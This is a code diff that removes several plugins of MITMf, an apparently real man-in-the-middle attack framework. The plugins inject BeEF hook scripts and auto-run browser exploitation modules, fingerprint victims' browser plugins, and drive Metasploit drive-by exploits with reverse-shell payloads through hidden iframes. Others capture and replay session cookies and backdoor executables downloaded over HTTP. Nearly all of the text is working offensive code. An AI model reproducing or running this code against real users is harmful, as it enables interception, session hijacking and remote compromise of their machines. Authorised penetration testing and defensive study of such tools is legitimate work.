# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import sys
|
|
||||||
import json
|
|
||||||
import threading
|
|
||||||
|
|
||||||
from time import sleep
|
|
||||||
from core.beefapi import BeefAPI
|
|
||||||
from core.utils import SystemConfig, shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BeefAutorun(Inject, Plugin):
|
|
||||||
name = "BeEFAutorun"
|
|
||||||
optname = "beefauto"
|
|
||||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.ip_address = SystemConfig.getIP(options.interface)
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
|
|
||||||
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
|
|
||||||
|
|
||||||
beefconfig = self.config['MITMf']['BeEF']
|
|
||||||
|
|
||||||
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
|
|
||||||
|
|
||||||
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
|
|
||||||
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
|
|
||||||
shutdown("[BeEFAutorun] Error logging in to BeEF!")
|
|
||||||
|
|
||||||
def startThread(self):
|
|
||||||
self.autorun()
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def autorun(self):
|
|
||||||
already_ran = []
|
|
||||||
already_hooked = []
|
|
||||||
|
|
||||||
while True:
|
|
||||||
mode = self.config['BeEFAutorun']['mode']
|
|
||||||
|
|
||||||
for hook in self.beef.hooked_browsers.online:
|
|
||||||
|
|
||||||
if hook.session not in already_hooked:
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
|
|
||||||
already_hooked.append(hook.session)
|
|
||||||
self.black_ips.append(hook.ip)
|
|
||||||
|
|
||||||
if mode == 'oneshot':
|
|
||||||
if hook.session not in already_ran:
|
|
||||||
self.execModules(hook)
|
|
||||||
already_ran.append(hook.session)
|
|
||||||
|
|
||||||
elif mode == 'loop':
|
|
||||||
self.execModules(hook)
|
|
||||||
sleep(10)
|
|
||||||
|
|
||||||
sleep(1)
|
|
||||||
|
|
||||||
def execModules(self, hook):
|
|
||||||
all_modules = self.config['BeEFAutorun']["ALL"]
|
|
||||||
targeted_modules = self.config['BeEFAutorun']["targets"]
|
|
||||||
|
|
||||||
if all_modules:
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
|
|
||||||
|
|
||||||
for module, options in all_modules.iteritems():
|
|
||||||
|
|
||||||
for m in self.beef.modules.findbyname(module):
|
|
||||||
resp = m.run(hook.session, json.loads(options))
|
|
||||||
|
|
||||||
if resp["success"] == 'true':
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
|
|
||||||
else:
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
|
|
||||||
|
|
||||||
sleep(0.5)
|
|
||||||
|
|
||||||
if (hook.name and hook.os):
|
|
||||||
for os in targeted_modules:
|
|
||||||
if (os == hook.os) or (os in hook.os):
|
|
||||||
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
|
|
||||||
|
|
||||||
for browser in targeted_modules[os]:
|
|
||||||
if browser == hook.name:
|
|
||||||
for module, options in targeted_modules[os][browser].iteritems():
|
|
||||||
for m in self.beef.modules.findbyname(module):
|
|
||||||
resp = m.run(hook.session, json.loads(options))
|
|
||||||
if resp["success"] == 'true':
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
|
|
||||||
else:
|
|
||||||
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
|
|
||||||
|
|
||||||
sleep(0.5)
|
|
|
@@ -1,65 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from pprint import pformat
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.Inject import Inject
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BrowserProfiler(Inject, Plugin):
|
|
||||||
name = "BrowserProfiler"
|
|
||||||
optname = "browserprofiler"
|
|
||||||
desc = "Attempts to enumerate all browser plugins of connected clients"
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.output = {} # so other plugins can access the results
|
|
||||||
|
|
||||||
Inject.initialize(self, options)
|
|
||||||
self.html_payload = self.get_payload()
|
|
||||||
|
|
||||||
def post2dict(self, post): #converts the ajax post to a dict
|
|
||||||
d = dict()
|
|
||||||
for line in post.split('&'):
|
|
||||||
t = line.split('=')
|
|
||||||
d[t[0]] = t[1]
|
|
||||||
return d
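
post2dict() just splits the URL-encoded body that plugindetect.js posts back into a dict keyed by field name; a quick illustration with made-up values (the field names match how self.output is later used by BrowserProfiler and BrowserSniper):

    body = 'plugin_list=Flash,Java&java_installed=1&flash_installed=1'
    print dict(pair.split('=') for pair in body.split('&'))
    # {'java_installed': '1', 'flash_installed': '1', 'plugin_list': 'Flash,Java'}  (key order may vary)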
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
#Handle the plugin output
|
|
||||||
if 'clientprfl' in request.uri:
|
|
||||||
request.printPostData = False
|
|
||||||
|
|
||||||
self.output = self.post2dict(request.postData)
|
|
||||||
self.output['ip'] = request.client.getClientIP()
|
|
||||||
self.output['useragent'] = request.clientInfo
|
|
||||||
|
|
||||||
if self.output['plugin_list']:
|
|
||||||
self.output['plugin_list'] = self.output['plugin_list'].split(',')
|
|
||||||
|
|
||||||
pretty_output = pformat(self.output)
|
|
||||||
mitmf_logger.info("{} [BrowserProfiler] Got data:\n{}".format(request.client.getClientIP(), pretty_output))
|
|
||||||
|
|
||||||
def get_payload(self):
|
|
||||||
plugindetect = open("./core/javascript/plugindetect.js", 'r').read()
|
|
||||||
return '<script type="text/javascript">' + plugindetect + '</script>'
|
|
|
@@ -1,194 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import string
|
|
||||||
import random
|
|
||||||
import logging
|
|
||||||
|
|
||||||
from time import sleep
|
|
||||||
from core.msfrpc import Msf
|
|
||||||
from core.utils import SystemConfig, shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from plugins.BrowserProfiler import BrowserProfiler
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class BrowserSniper(BrowserProfiler, Plugin):
|
|
||||||
name = "BrowserSniper"
|
|
||||||
optname = "browsersniper"
|
|
||||||
desc = "Performs drive-by attacks on clients with out-of-date browser plugins"
|
|
||||||
version = "0.4"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.options = options
|
|
||||||
self.msfip = SystemConfig.getIP(options.interface)
|
|
||||||
self.sploited_ips = list() #store ip of pwned or not vulnerable clients so we don't re-exploit
|
|
||||||
|
|
||||||
#Initialize the BrowserProfiler plugin
|
|
||||||
BrowserProfiler.initialize(self, options)
|
|
||||||
|
|
||||||
msfversion = Msf().version()
|
|
||||||
self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
|
|
||||||
|
|
||||||
def startThread(self):
|
|
||||||
self.snipe()
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def _genRandURL(self): #generates a random url for our exploits (urls are generated with a / at the beginning)
|
|
||||||
return "/" + ''.join(random.sample(string.ascii_uppercase + string.ascii_lowercase, 5))
|
|
||||||
|
|
||||||
def _getRandPort(self):
|
|
||||||
return random.randint(1000, 65535)
|
|
||||||
|
|
||||||
def _setupExploit(self, exploit, msfport):
|
|
||||||
|
|
||||||
rand_url = self._genRandURL()
|
|
||||||
rand_port = self._getRandPort()
|
|
||||||
#generate the command string to send to the virtual console
|
|
||||||
#new line character very important as it simulates a user pressing enter
|
|
||||||
cmd = "use exploit/{}\n".format(exploit)
|
|
||||||
cmd += "set SRVPORT {}\n".format(msfport)
|
|
||||||
cmd += "set URIPATH {}\n".format(rand_url)
|
|
||||||
cmd += "set PAYLOAD generic/shell_reverse_tcp\n"
|
|
||||||
cmd += "set LHOST {}\n".format(self.msfip)
|
|
||||||
cmd += "set LPORT {}\n".format(rand_port)
|
|
||||||
cmd += "set ExitOnSession False\n"
|
|
||||||
cmd += "exploit -j\n"
|
|
||||||
|
|
||||||
Msf().sendcommand(cmd)
|
|
||||||
|
|
||||||
return (rand_url, rand_port)
|
|
||||||
|
|
||||||
def _compat_system(self, os_config, brw_config):
|
|
||||||
os = self.output['useragent'][0].lower()
|
|
||||||
browser = self.output['useragent'][1].lower()
|
|
||||||
|
|
||||||
if (os_config == 'any') and (brw_config == 'any'):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config == 'any') and (brw_config in browser):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config in os) and (brw_config == 'any'):
|
|
||||||
return True
|
|
||||||
|
|
||||||
if (os_config in os) and (brw_config in browser):
|
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
def getExploits(self):
|
|
||||||
exploits = list()
|
|
||||||
vic_ip = self.output['ip']
|
|
||||||
|
|
||||||
#First get the client's info
|
|
||||||
java = None
|
|
||||||
if (self.output['java_installed'] == '1') and (self.output['java_version'] != 'null'):
|
|
||||||
java = self.output['java_version']
|
|
||||||
|
|
||||||
flash = None
|
|
||||||
if (self.output['flash_installed'] == '1') and (self.output['flash_version'] != 'null'):
|
|
||||||
flash = self.output['flash_version']
|
|
||||||
|
|
||||||
mitmf_logger.debug("{} [BrowserSniper] Java installed: {} | Flash installed: {}".format(vic_ip, java, flash))
|
|
||||||
|
|
||||||
for exploit, details in self.config['BrowserSniper'].iteritems():
|
|
||||||
|
|
||||||
if self._compat_system(details['OS'].lower(), details['Browser'].lower()):
|
|
||||||
|
|
||||||
if details['Type'].lower() == 'browservuln':
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
elif details['Type'].lower() == 'pluginvuln':
|
|
||||||
|
|
||||||
if details['Plugin'].lower() == 'java':
|
|
||||||
if (java is not None) and (java in details['PluginVersions']):
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
elif details['Plugin'].lower() == 'flash':
|
|
||||||
|
|
||||||
if (flash is not None) and (flash in details['PluginVersions']):
|
|
||||||
exploits.append(exploit)
|
|
||||||
|
|
||||||
mitmf_logger.debug("{} [BrowserSniper] Compatible exploits: {}".format(vic_ip, exploits))
|
|
||||||
return exploits
|
|
||||||
|
|
||||||
def injectAndPoll(self, ip, inject_payload): #here we inject an iframe to trigger the exploit and check for resulting sessions
|
|
||||||
|
|
||||||
#inject iframe
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Now injecting iframe to trigger exploits".format(ip))
|
|
||||||
self.html_payload = inject_payload #temporarily changes the code that the Browserprofiler plugin injects
|
|
||||||
|
|
||||||
#The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
|
|
||||||
#Will also make sure the shell actually came from the box that we targeted
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] Waiting for ze shellz, sit back and relax...'.format(ip))
|
|
||||||
|
|
||||||
poll_n = 1
|
|
||||||
msf = Msf()
|
|
||||||
while poll_n != 30:
|
|
||||||
|
|
||||||
if msf.sessionsfrompeer(ip):
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Client haz been 0wn3d! Enjoy!".format(ip))
|
|
||||||
self.sploited_ips.append(ip)
|
|
||||||
self.black_ips = self.sploited_ips #Add to inject blacklist since box has been popped
|
|
||||||
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
|
||||||
return
|
|
||||||
|
|
||||||
poll_n += 1
|
|
||||||
sleep(2)
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Session not established after 60 seconds".format(ip))
|
|
||||||
self.html_payload = self.get_payload() # restart the BrowserProfiler plugin
|
|
||||||
|
|
||||||
def snipe(self):
|
|
||||||
while True:
|
|
||||||
if self.output:
|
|
||||||
vic_ip = self.output['ip']
|
|
||||||
msfport = self.config['MITMf']['Metasploit']['msfport']
|
|
||||||
exploits = self.getExploits()
|
|
||||||
|
|
||||||
if not exploits:
|
|
||||||
if vic_ip not in self.sploited_ips:
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
|
|
||||||
self.sploited_ips.append(vic_ip)
|
|
||||||
self.black_ips = self.sploited_ips
|
|
||||||
|
|
||||||
elif exploits and (vic_ip not in self.sploited_ips):
|
|
||||||
mitmf_logger.info("{} [BrowserSniper] Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
|
|
||||||
inject_payload = ''
|
|
||||||
|
|
||||||
msf = Msf()
|
|
||||||
for exploit in exploits:
|
|
||||||
|
|
||||||
pid = msf.findpid(exploit)
|
|
||||||
if pid:
|
|
||||||
mitmf_logger.info('{} [BrowserSniper] {} already started'.format(vic_ip, exploit))
|
|
||||||
url = msf.jobinfo(pid)['uripath'] #get the url assigned to the exploit
|
|
||||||
inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, msfport, url)
|
|
||||||
else:
|
|
||||||
url, port = self._setupExploit(exploit, msfport)
|
|
||||||
inject_payload += "<iframe src='http://{}:{}{}' height=0%% width=0%%></iframe>".format(self.msfip, port, url)
|
|
||||||
|
|
||||||
self.injectAndPoll(vic_ip, inject_payload)
|
|
||||||
|
|
||||||
sleep(1)
|
|
|
@@ -1,45 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class CacheKill(Plugin):
|
|
||||||
name = "CacheKill"
|
|
||||||
optname = "cachekill"
|
|
||||||
desc = "Kills page caching by modifying headers"
|
|
||||||
version = "0.1"
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.bad_headers = ['if-none-match', 'if-modified-since']
|
|
||||||
|
|
||||||
def serverHeaders(self, response, request):
|
|
||||||
'''Handles all response headers'''
|
|
||||||
response.headers['Expires'] = "0"
|
|
||||||
response.headers['Cache-Control'] = "no-cache"
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
'''Handles outgoing request'''
|
|
||||||
request.headers['pragma'] = 'no-cache'
|
|
||||||
for header in self.bad_headers:
|
|
||||||
if header in request.headers:
|
|
||||||
del request.headers[header]
|
|
|
@@ -1,105 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import ast
|
|
||||||
import sys
|
|
||||||
|
|
||||||
from datetime import datetime
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from twisted.internet import reactor
|
|
||||||
from twisted.web import http
|
|
||||||
from twisted.internet import reactor
|
|
||||||
from core.utils import shutdown
|
|
||||||
from core.ferretng.FerretProxy import FerretProxy
|
|
||||||
from core.ferretng.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class FerretNG(Plugin):
|
|
||||||
name = "Ferret-NG"
|
|
||||||
optname = "ferretng"
|
|
||||||
desc = "Captures cookies and starts a proxy that will feed them to connected clients"
|
|
||||||
version = "0.1"
|
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
self.ferret_port = 10010 or options.ferret_port
|
|
||||||
self.cookie_file = None
|
|
||||||
|
|
||||||
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
|
||||||
|
|
||||||
if options.cookie_file:
|
|
||||||
self.tree_info.append('Loading cookies from log file')
|
|
||||||
try:
|
|
||||||
with open(options.cookie_file, 'r') as cookie_file:
|
|
||||||
self.cookie_file = ast.literal_eval(cookie_file.read())
|
|
||||||
URLMonitor.getInstance().cookies = self.cookie_file
|
|
||||||
cookie_file.close()
|
|
||||||
except Exception as e:
|
|
||||||
shutdown("[-] Error loading cookie log file: {}".format(e))
|
|
||||||
|
|
||||||
self.tree_info.append("Listening on port {}".format(self.ferret_port))
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client']))
|
|
||||||
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
if 'cookie' in request.headers:
|
|
||||||
host = request.headers['host']
|
|
||||||
cookie = request.headers['cookie']
|
|
||||||
client = request.client.getClientIP()
|
|
||||||
|
|
||||||
if client not in URLMonitor.getInstance().cookies:
|
|
||||||
URLMonitor.getInstance().cookies[client] = []
|
|
||||||
|
|
||||||
for entry in URLMonitor.getInstance().cookies[client]:
|
|
||||||
if host == entry['host']:
|
|
||||||
mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host))
|
|
||||||
entry['host'] = host
|
|
||||||
entry['cookie'] = cookie
|
|
||||||
return
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie))
|
|
||||||
URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
|
|
||||||
|
|
||||||
def pluginReactor(self, StrippingProxy):
|
|
||||||
FerretFactory = http.HTTPFactory(timeout=10)
|
|
||||||
FerretFactory.protocol = FerretProxy
|
|
||||||
reactor.listenTCP(self.ferret_port, FerretFactory)
|
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
|
||||||
options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)')
|
|
||||||
options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file')
|
|
||||||
|
|
||||||
def finish(self):
|
|
||||||
if not URLMonitor.getInstance().cookies:
|
|
||||||
return
|
|
||||||
|
|
||||||
if self.cookie_file == URLMonitor.getInstance().cookies:
|
|
||||||
return
|
|
||||||
|
|
||||||
mitmf_logger.info("[Ferret-NG] Writing cookies to log file")
|
|
||||||
with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
|
|
||||||
cookie_file.write(str(URLMonitor.getInstance().cookies))
|
|
||||||
cookie_file.close()
|
|
|
@@ -1,640 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
|
||||||
#
|
|
||||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
|
||||||
#
|
|
||||||
# Copyright (c) 2013-2014, Joshua Pitts
|
|
||||||
# All rights reserved.
|
|
||||||
#
|
|
||||||
# Redistribution and use in source and binary forms, with or without modification,
|
|
||||||
# are permitted provided that the following conditions are met:
|
|
||||||
#
|
|
||||||
# 1. Redistributions of source code must retain the above copyright notice,
|
|
||||||
# this list of conditions and the following disclaimer.
|
|
||||||
#
|
|
||||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
|
||||||
# this list of conditions and the following disclaimer in the documentation
|
|
||||||
# and/or other materials provided with the distribution.
|
|
||||||
#
|
|
||||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
|
||||||
# may be used to endorse or promote products derived from this software without
|
|
||||||
# specific prior written permission.
|
|
||||||
#
|
|
||||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
||||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
||||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
||||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
||||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
||||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
||||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
||||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
||||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
# POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
#
|
|
||||||
# Tested on Kali-Linux.
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import os
|
|
||||||
import pefile
|
|
||||||
import zipfile
|
|
||||||
import logging
|
|
||||||
import shutil
|
|
||||||
import random
|
|
||||||
import string
|
|
||||||
import threading
|
|
||||||
import tarfile
|
|
||||||
import multiprocessing
|
|
||||||
|
|
||||||
from libs.bdfactory import pebin
|
|
||||||
from libs.bdfactory import elfbin
|
|
||||||
from libs.bdfactory import machobin
|
|
||||||
from core.msfrpc import Msf
|
|
||||||
from core.utils import shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from tempfile import mkstemp
|
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class FilePwn(Plugin):
|
|
||||||
name = "FilePwn"
|
|
||||||
optname = "filepwn"
|
|
||||||
desc = "Backdoor executables being sent over http using bdfactory"
|
|
||||||
tree_info = ["BDFProxy v0.3.2 online"]
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
|
|
||||||
self.patched = multiprocessing.Queue()
|
|
||||||
|
|
||||||
#FOR FUTURE USE
|
|
||||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
|
||||||
|
|
||||||
#FOR FUTURE USE
|
|
||||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
|
||||||
|
|
||||||
#USED NOW
|
|
||||||
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
|
||||||
'pe': {'number': 'MZ', 'offset': 0},
|
|
||||||
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
|
||||||
'bz': {'number': 'BZ', 'offset': 0},
|
|
||||||
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
|
||||||
'tar': {'number': 'ustar', 'offset': 257},
|
|
||||||
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
|
||||||
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
|
||||||
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
|
||||||
}
|
|
||||||
|
|
||||||
#NOT USED NOW
|
|
||||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
|
||||||
|
|
||||||
#FilePwn options
|
|
||||||
self.userConfig = self.config['FilePwn']
|
|
||||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
|
||||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
|
||||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
|
||||||
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
|
||||||
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
|
||||||
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
|
||||||
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
|
||||||
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
|
||||||
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
|
||||||
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
|
||||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
|
||||||
|
|
||||||
msfversion = Msf().version()
|
|
||||||
self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
|
|
||||||
|
|
||||||
t = threading.Thread(name='setupMSF', target=self.setupMSF)
|
|
